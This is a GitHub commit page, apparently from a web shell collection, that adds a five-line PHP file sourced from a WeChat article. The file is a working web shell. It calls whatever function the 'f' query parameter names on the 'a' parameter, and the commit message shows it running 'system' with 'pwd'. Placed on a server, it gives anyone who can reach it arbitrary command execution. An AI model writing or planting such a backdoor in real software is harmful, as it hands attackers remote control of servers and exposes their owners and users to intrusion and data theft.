Create 2022-08-26-08.php

from: https://mp.weixin.qq.com/s/f6cFhc0Ukk0wQFGP1lQ4BQ
usage: http://example.com/shell.php?f=system&a=pwd
This commit is contained in:
tennc 2022-08-26 19:54:45 +08:00 committed by GitHub
parent 6aab7111e9
commit b37de05dbb
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

5
php/2022-08-26-08.php Normal file
View file

@ -0,0 +1,5 @@
<?php
$f = $_GET['f'];
$a = $_GET['a'];
$f($a)
?>